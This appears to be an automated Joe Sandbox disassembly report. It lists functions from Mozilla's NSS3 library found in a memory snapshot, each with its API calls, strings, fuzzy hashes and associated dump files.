Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: ArenaPool$Util$AlgorithmCallErrorFinishFreeOnceTag_$CriticalDecodeDestroyEnterFindInitItem_PublicQuickSectionUnlockValue
String ID: security
API String ID: 3441714441-3315324353
Opcode ID: 71f27c4d46e2fa2ea7606bedf2af6483dacb8d60dcad7583035558c7a82d8037
Instruction ID: 04a78dc9bfe2ad9b2bdf503eef999ed46ea59457b21679fc11bdd8eb8f1b974d
Opcode Fuzzy Hash: 71f27c4d46e2fa2ea7606bedf2af6483dacb8d60dcad7583035558c7a82d8037
Instruction Fuzzy Hash: 834107B390421067E7205B189E4ABAA3BBCAF5A72CF150935E815D6F41F735EA08C7D3

Function 6C7A6AF0 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 101COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_DecryptFinal), ref: 6C7A6B16
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C7A6B44
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C7A6B53

Part of subcall function 6C88D930: PL_strncpyz.NSS3(?,?,?), ref: 6C88D963

PR_LogPrint.NSS3(?,00000000), ref: 6C7A6B69
PR_LogPrint.NSS3( pLastPart = 0x%p,?), ref: 6C7A6B85
PR_LogPrint.NSS3( pulLastPartLen = 0x%p,?), ref: 6C7A6BA0
PR_LogPrint.NSS3( *pulLastPartLen = 0x%x,?), ref: 6C7A6C0A

Strings

*pulLastPartLen = 0x%x, xrefs: 6C7A6C05
(CK_INVALID_HANDLE), xrefs: 6C7A6B4C
C_DecryptFinal, xrefs: 6C7A6B11
pLastPart = 0x%p, xrefs: 6C7A6B80
pulLastPartLen = 0x%p, xrefs: 6C7A6B9B
hSession = 0x%x, xrefs: 6C7A6B2E, 6C7A6B3E

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulLastPartLen = 0x%x$ hSession = 0x%x$ pLastPart = 0x%p$ pulLastPartLen = 0x%p$ (CK_INVALID_HANDLE)$C_DecryptFinal
API String ID: 1003633598-2565524109
Opcode ID: 3f1358be7c90a7299ffe4300ca10f90fb28c83540beef790ccc8976653f1edab
Instruction ID: d9b41fb51e7854bf671b8a33bbb627f5f61ba833720e0fcda9923d9800bcc387
Opcode Fuzzy Hash: 3f1358be7c90a7299ffe4300ca10f90fb28c83540beef790ccc8976653f1edab
Instruction Fuzzy Hash: 9A31E331602154AFDB209F98CF8CF9A77B5EB4631DF044875E80897A12DB34B949CB91

Function 6C88AF70 Relevance: 22.7, APIs: 15, Instructions: 221threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C839890: TlsGetValue.KERNEL32(?,?,?,6C8397EB), ref: 6C83989E

EnterCriticalSection.KERNEL32(?), ref: 6C88AF88
_PR_MD_NOTIFYALL_CV.NSS3(?), ref: 6C88AFCE
PR_SetPollableEvent.NSS3(?), ref: 6C88AFD9
EnterCriticalSection.KERNEL32(?), ref: 6C88AFEF
_PR_MD_NOTIFY_CV.NSS3(?), ref: 6C88B00F
_PR_MD_UNLOCK.NSS3(?), ref: 6C88B02F
_PR_MD_UNLOCK.NSS3(?), ref: 6C88B070
PR_JoinThread.NSS3(?), ref: 6C88B07B
free.MOZGLUE(?), ref: 6C88B084
EnterCriticalSection.KERNEL32(?), ref: 6C88B09B
_PR_MD_UNLOCK.NSS3(?), ref: 6C88B0C4
PR_JoinThread.NSS3(?), ref: 6C88B0F3
free.MOZGLUE(?), ref: 6C88B0FC
PR_JoinThread.NSS3(?), ref: 6C88B137
free.MOZGLUE(?), ref: 6C88B140

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: CriticalEnterJoinSectionThreadfree$EventPollableValue
String ID:
API String ID: 235599594-0
Opcode ID: 0b324664a1a7b491b338a8a86616d56c9bdecf36b95eb6de74993fca6b7f7bac
Instruction ID: 62b1330decc2d4a07ea6a7ab2162bbaaa9a0ce60a1ecbb26c5d5f87fcc0d4cdb
Opcode Fuzzy Hash: 0b324664a1a7b491b338a8a86616d56c9bdecf36b95eb6de74993fca6b7f7bac
Instruction Fuzzy Hash: 0F915DB5901611DFCB20DF19CA80856BBF1FF853187298969D8199BB22E732FD46CBC1

Function 6C792980 Relevance: 22.7, APIs: 15, Instructions: 217COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6C779E71,?,?,6C78F03D), ref: 6C7929A2
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6C779E71,?), ref: 6C7929B6
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6C779E71,?,?,6C78F03D), ref: 6C7929E2
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6C779E71,?), ref: 6C7929F6
PL_HashTableLookup.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C779E71,?), ref: 6C792A06
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C779E71), ref: 6C792A13

Part of subcall function 6C81DD70: TlsGetValue.KERNEL32 ref: 6C81DD8C
Part of subcall function 6C81DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C81DDB4

PR_Unlock.NSS3(?), ref: 6C792A6A
TlsGetValue.KERNEL32 ref: 6C792A98
EnterCriticalSection.KERNEL32(?), ref: 6C792AAC
PL_HashTableLookup.NSS3(?,?), ref: 6C792ABC
PR_Unlock.NSS3(?), ref: 6C792AC9
TlsGetValue.KERNEL32 ref: 6C792B3D
EnterCriticalSection.KERNEL32(?), ref: 6C792B51
PL_HashTableLookup.NSS3(?,6C779E71), ref: 6C792B61
PR_Unlock.NSS3(?), ref: 6C792B6E

Part of subcall function 6C7607A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C6F204A), ref: 6C7607AD
Part of subcall function 6C7607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6F204A), ref: 6C7607CD
Part of subcall function 6C7607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6F204A), ref: 6C7607D6
Part of subcall function 6C7607A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C6F204A), ref: 6C7607E4
Part of subcall function 6C7607A0: TlsSetValue.KERNEL32(00000000,?,6C6F204A), ref: 6C760864
Part of subcall function 6C7607A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C760880
Part of subcall function 6C7607A0: TlsSetValue.KERNEL32(00000000,?,?,6C6F204A), ref: 6C7608CB
Part of subcall function 6C7607A0: TlsGetValue.KERNEL32(?,?,6C6F204A), ref: 6C7608D7
Part of subcall function 6C7607A0: TlsGetValue.KERNEL32(?,?,6C6F204A), ref: 6C7608FB

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Value$CriticalSection$EnterUnlock$HashLookupTable$calloc$Leave
String ID:
API String ID: 2204204336-0
Opcode ID: 4652aa00e605d89bd9e7afaab3efb000c5a2397eb036d1acd271a623128fc2bb
Instruction ID: 0e3e6d2a2aa4991f81ac24a58a360ffa46dd0aeb4b27a9094aeda4225725651b
Opcode Fuzzy Hash: 4652aa00e605d89bd9e7afaab3efb000c5a2397eb036d1acd271a623128fc2bb
Instruction Fuzzy Hash: BA71F476D00204ABDB11AF28ED4899ABBB8FF1635CB058535ED189BB12FB31E954C7D0

Function 6C788DE0 Relevance: 22.7, APIs: 15, Instructions: 173memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?), ref: 6C788E22
EnterCriticalSection.KERNEL32(?), ref: 6C788E36
memset.VCRUNTIME140(?,00000000,?), ref: 6C788E4F
calloc.MOZGLUE(00000001,?,?,?), ref: 6C788E78
memcpy.VCRUNTIME140(-00000008,?,?), ref: 6C788E9B
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C788EAC
PL_ArenaAllocate.NSS3(?,?), ref: 6C788EDE
memcpy.VCRUNTIME140(-00000008,?,?), ref: 6C788EF0
memset.VCRUNTIME140(?,00000000,?), ref: 6C788F00
free.MOZGLUE(?), ref: 6C788F0E
memcpy.VCRUNTIME140(?,?,?), ref: 6C788F39
memset.VCRUNTIME140(?,00000000,?), ref: 6C788F4A
memset.VCRUNTIME140(?,00000000,?), ref: 6C788F5B
PR_Unlock.NSS3(?), ref: 6C788F72
PR_Unlock.NSS3(?), ref: 6C788F82

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: memset$memcpy$Unlock$AllocateArenaCriticalEnterSectionValuecallocfree
String ID:
API String ID: 1569127702-0
Opcode ID: e4c227acf365f9651af40915d1f4747a03b335c55c84e76027dca5de30e03625
Instruction ID: 53bb757dcaf87ab12245cc339c40754e17b0856ff4376d05723d7dbfeb58a36a
Opcode Fuzzy Hash: e4c227acf365f9651af40915d1f4747a03b335c55c84e76027dca5de30e03625
Instruction Fuzzy Hash: 665127B2E022159FDB209F68CE8496AB7B9EF45358F15453AED089BB00E731ED44C7E1

Function 6C7ACE90 Relevance: 22.6, APIs: 15, Instructions: 129COMMON

Download Yara Rule

APIs

PK11_DoesMechanism.NSS3(?,00000132), ref: 6C7ACE9E
PK11_DoesMechanism.NSS3(?,00000321), ref: 6C7ACEBB
PK11_DoesMechanism.NSS3(?,00001081), ref: 6C7ACED8
PK11_DoesMechanism.NSS3(?,00000551), ref: 6C7ACEF5
PK11_DoesMechanism.NSS3(?,00000651), ref: 6C7ACF12
PK11_DoesMechanism.NSS3(?,00000321), ref: 6C7ACF2F
PK11_DoesMechanism.NSS3(?,00000121), ref: 6C7ACF4C
PK11_DoesMechanism.NSS3(?,00000400), ref: 6C7ACF69
PK11_DoesMechanism.NSS3(?,00000341), ref: 6C7ACF86
PK11_DoesMechanism.NSS3(?,00000311), ref: 6C7ACFA3
PK11_DoesMechanism.NSS3(?,00000301), ref: 6C7ACFBC
PK11_DoesMechanism.NSS3(?,00000331), ref: 6C7ACFD5
PK11_DoesMechanism.NSS3(?,00000101), ref: 6C7ACFEE
PK11_DoesMechanism.NSS3(?,00000141), ref: 6C7AD007
PK11_DoesMechanism.NSS3(?,00001008), ref: 6C7AD021

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: DoesK11_Mechanism
String ID:
API String ID: 622698949-0
Opcode ID: c609708ecc05f08e56bb69c1b70e37aefe8df33e1a02ba745add6446eb52fb33
Instruction ID: d71861b3d45e424af87785eeb7c0594796b62e7ef0f97990e010552d3e1d2250
Opcode Fuzzy Hash: c609708ecc05f08e56bb69c1b70e37aefe8df33e1a02ba745add6446eb52fb33
Instruction Fuzzy Hash: 16312171B529112BEF0D509B6F2DBDF244A4B6630EF441138FD0AF67C1FAC59A1702AA

Function 6C880FF0 Relevance: 22.6, APIs: 15, Instructions: 92COMMON

Download Yara Rule

APIs

PR_Lock.NSS3(?), ref: 6C881000

Part of subcall function 6C839BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6C761A48), ref: 6C839BB3
Part of subcall function 6C839BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6C761A48), ref: 6C839BC8

PR_SetError.NSS3(FFFFE8D5,00000000), ref: 6C881016

Part of subcall function 6C81C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C81C2BF

PR_Unlock.NSS3(?), ref: 6C881021

Part of subcall function 6C81DD70: TlsGetValue.KERNEL32 ref: 6C81DD8C
Part of subcall function 6C81DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C81DDB4

PR_SetError.NSS3(FFFFE89D,00000000), ref: 6C881046
PR_Unlock.NSS3(?), ref: 6C88106B
PR_Lock.NSS3 ref: 6C881079
PR_Unlock.NSS3 ref: 6C881096
free.MOZGLUE(?), ref: 6C8810A7
free.MOZGLUE(?), ref: 6C8810B4
PR_DestroyCondVar.NSS3(?), ref: 6C8810BF
PR_DestroyCondVar.NSS3(?), ref: 6C8810CA
PR_DestroyCondVar.NSS3(?), ref: 6C8810D5
PR_DestroyCondVar.NSS3(?), ref: 6C8810E0
PR_DestroyLock.NSS3(?), ref: 6C8810EB
free.MOZGLUE(?), ref: 6C881105

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Destroy$Cond$LockUnlockValuefree$CriticalErrorSection$EnterLeave
String ID:
API String ID: 8544004-0
Opcode ID: 20e58db071378e3ab96b8d8fa165a6e23142d8334961c51cf5d0891d3c52fef8
Instruction ID: c68648bfbfec31e49407938fce6ced4a348bd8e3600e179bc65660232b309f74
Opcode Fuzzy Hash: 20e58db071378e3ab96b8d8fa165a6e23142d8334961c51cf5d0891d3c52fef8
Instruction Fuzzy Hash: 9631BCB9901402ABD7229F15EE46A45B7B1FF0136DB184535E80903F61EB32F978DBD2

Function 6C7BEDD0 Relevance: 21.2, APIs: 14, Instructions: 239memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(?), ref: 6C7BEE0B

Part of subcall function 6C7D0BE0: malloc.MOZGLUE(6C7C8D2D,?,00000000,?), ref: 6C7D0BF8
Part of subcall function 6C7D0BE0: TlsGetValue.KERNEL32(6C7C8D2D,?,00000000,?), ref: 6C7D0C15

PR_SetError.NSS3(FFFFE013,00000000), ref: 6C7BEEE1

Part of subcall function 6C7B1D50: TlsGetValue.KERNEL32(00000000,-00000018), ref: 6C7B1D7E
Part of subcall function 6C7B1D50: EnterCriticalSection.KERNEL32(?), ref: 6C7B1D8E
Part of subcall function 6C7B1D50: PR_Unlock.NSS3(?), ref: 6C7B1DD3

TlsGetValue.KERNEL32 ref: 6C7BEE51
EnterCriticalSection.KERNEL32(?), ref: 6C7BEE65
PR_Unlock.NSS3(?), ref: 6C7BEEA2
free.MOZGLUE(?), ref: 6C7BEEBB
PR_SetError.NSS3(00000000,00000000), ref: 6C7BEED0
PR_Unlock.NSS3(?), ref: 6C7BEF48
free.MOZGLUE(?), ref: 6C7BEF68
PR_SetError.NSS3(00000000,00000000), ref: 6C7BEF7D
PK11_DoesMechanism.NSS3(?,?), ref: 6C7BEFA4
free.MOZGLUE(?), ref: 6C7BEFDA
PR_SetError.NSS3(FFFFE040,00000000), ref: 6C7BF055
free.MOZGLUE(?), ref: 6C7BF060

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Errorfree$UnlockValue$CriticalEnterSection$Alloc_DoesK11_MechanismUtilmalloc
String ID:
API String ID: 2524771861-0
Opcode ID: 8034aef395cdf0d80c23a7cc3d7ff3324e6022aa23a75d88642181effa17d4e3
Instruction ID: f40c75c7d403bf1e4fb6683cfb4846f901048a5a0a10af57ab979adbe410b002
Opcode Fuzzy Hash: 8034aef395cdf0d80c23a7cc3d7ff3324e6022aa23a75d88642181effa17d4e3
Instruction Fuzzy Hash: 54814FB5A00209AFEB109FA5DD45ADE77B9BF08318F544074F909A7B11E731E924CBE1

Function 6C784CF0 Relevance: 21.2, APIs: 14, Instructions: 237memoryCOMMON

Download Yara Rule

APIs

PK11_SignatureLen.NSS3(?), ref: 6C784D80
PORT_Alloc_Util.NSS3(00000000), ref: 6C784D95
PORT_NewArena_Util.NSS3(00000800), ref: 6C784DF2
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C784E2C
PR_SetError.NSS3(FFFFE028,00000000), ref: 6C784E43
PORT_NewArena_Util.NSS3(00000800), ref: 6C784E58
SGN_CreateDigestInfo_Util.NSS3(00000001,?,?), ref: 6C784E85
DER_Encode_Util.NSS3(?,?,6C8D05A4,00000000), ref: 6C784EA7
PK11_SignWithMechanism.NSS3(?,-00000001,00000000,?,?), ref: 6C784F17
DSAU_EncodeDerSigWithLen.NSS3(?,?,?), ref: 6C784F45
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C784F62
PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C784F7A
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C784F89
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C784FC8

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Util$Arena_$ErrorFreeItem_K11_WithZfree$Alloc_CreateDigestEncodeEncode_Info_MechanismSignSignature
String ID:
API String ID: 2843999940-0
Opcode ID: 0129e0cec2f8436e51a6cd100d3e88383dbd44b224626c21e379fed43f78a82d
Instruction ID: ac262cbec8a4569b5b20c569ac3139ab1b32e701c8abf289d83737bc8e4b4ae3
Opcode Fuzzy Hash: 0129e0cec2f8436e51a6cd100d3e88383dbd44b224626c21e379fed43f78a82d
Instruction Fuzzy Hash: BE81B471909301AFE711CF28DA54B5BB7E8AB84318F15893DFA58DB641E770EA04CB92

Function 6C780470 Relevance: 21.2, APIs: 14, Instructions: 206timeCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6C7804B7

Part of subcall function 6C7D0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C7787ED,00000800,6C76EF74,00000000), ref: 6C7D1000
Part of subcall function 6C7D0FF0: PR_NewLock.NSS3(?,00000800,6C76EF74,00000000), ref: 6C7D1016
Part of subcall function 6C7D0FF0: PL_InitArenaPool.NSS3(00000000,security,6C7787ED,00000008,?,00000800,6C76EF74,00000000), ref: 6C7D102B

PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C780539

Part of subcall function 6C7D1200: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6C7788A4,00000000,00000000), ref: 6C7D1228
Part of subcall function 6C7D1200: EnterCriticalSection.KERNEL32(B8AC9BDF), ref: 6C7D1238
Part of subcall function 6C7D1200: PL_ClearArenaPool.NSS3(00000000,00000000,00000000,00000000,00000000,?,6C7788A4,00000000,00000000), ref: 6C7D124B
Part of subcall function 6C7D1200: PR_CallOnce.NSS3(6C8D2AA4,6C7D12D0,00000000,00000000,00000000,?,6C7788A4,00000000,00000000), ref: 6C7D125D
Part of subcall function 6C7D1200: PL_FreeArenaPool.NSS3(00000000,00000000,00000000), ref: 6C7D126F
Part of subcall function 6C7D1200: free.MOZGLUE(00000000,?,00000000,00000000), ref: 6C7D1280
Part of subcall function 6C7D1200: PR_Unlock.NSS3(00000000,?,?,00000000,00000000), ref: 6C7D128E
Part of subcall function 6C7D1200: DeleteCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000), ref: 6C7D129A
Part of subcall function 6C7D1200: free.MOZGLUE(00000000,?,?,?,00000000,00000000), ref: 6C7D12A1

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C78054A
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C78056D
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C7805CA
DER_GeneralizedTimeToTime_Util.NSS3(?,?), ref: 6C7805EA
PR_SetError.NSS3(FFFFE00C,00000000), ref: 6C7805FD
PR_SetError.NSS3(FFFFE07E,00000000), ref: 6C780621
PR_EnterMonitor.NSS3 ref: 6C78063E
PR_ExitMonitor.NSS3 ref: 6C780668
CERT_DestroyCertificate.NSS3(?), ref: 6C780697
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C7806AC
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C7806CC
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C7806DA

Part of subcall function 6C77E6B0: PORT_ArenaMark_Util.NSS3(00000000,?,00000000,?,?,6C7804DC,?,?), ref: 6C77E6C9
Part of subcall function 6C77E6B0: PORT_ArenaAlloc_Util.NSS3(00000000,00000088,?,?,00000000,?,?,6C7804DC,?,?), ref: 6C77E6D9
Part of subcall function 6C77E6B0: memset.VCRUNTIME140(00000000,00000000,00000088,?,?,?,?,00000000,?,?,6C7804DC,?,?), ref: 6C77E6F4
Part of subcall function 6C77E6B0: SECOID_SetAlgorithmID_Util.NSS3(00000000,00000000,00000004,00000000,?,?,?,?,?,?,?,00000000,?,?,6C7804DC,?), ref: 6C77E703
Part of subcall function 6C77E6B0: CERT_FindCertIssuer.NSS3(?,?,6C7804DC,0000000B,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C77E71E

Part of subcall function 6C77F660: PR_EnterMonitor.NSS3(6C78050F,?,00000001,?,?,?), ref: 6C77F6A8
Part of subcall function 6C77F660: PR_Now.NSS3(?,?,?,00000001,?,?,?), ref: 6C77F6C1
Part of subcall function 6C77F660: PR_ExitMonitor.NSS3(?,?,?,00000001,?,?,?), ref: 6C77F7C8

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Util$ArenaArena_ErrorFree$Monitor$EnterPool$CriticalExitSectionfree$AlgorithmAlloc_CallCertCertificateClearDeleteDestroyFindGeneralizedInitIssuerLockMark_OnceTimeTime_UnlockValuecallocmemset
String ID:
API String ID: 2470852775-0
Opcode ID: 1b2964dc7ed28b9641a464dbbc4925aec8081ef0083f051ffc6b2015875cebc4
Instruction ID: cfd86ec0db00c402065cc29410dc2d74e21bdb8992c523601b1aa5e8d8eb4dda
Opcode Fuzzy Hash: 1b2964dc7ed28b9641a464dbbc4925aec8081ef0083f051ffc6b2015875cebc4
Instruction Fuzzy Hash: F261C271A063429FEB10DE68CE44F5B77E4AF84358F104538FA5997B91E730E918CBA2

Function 6C7B8F40 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(6C7B9582), ref: 6C7B8F5B

Part of subcall function 6C7CBE30: SECOID_FindOID_Util.NSS3(6C78311B,00000000,?,6C78311B,?), ref: 6C7CBE44

PORT_NewArena_Util.NSS3(00000800), ref: 6C7B8F6A

Part of subcall function 6C7D0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C7787ED,00000800,6C76EF74,00000000), ref: 6C7D1000
Part of subcall function 6C7D0FF0: PR_NewLock.NSS3(?,00000800,6C76EF74,00000000), ref: 6C7D1016
Part of subcall function 6C7D0FF0: PL_InitArenaPool.NSS3(00000000,security,6C7787ED,00000008,?,00000800,6C76EF74,00000000), ref: 6C7D102B

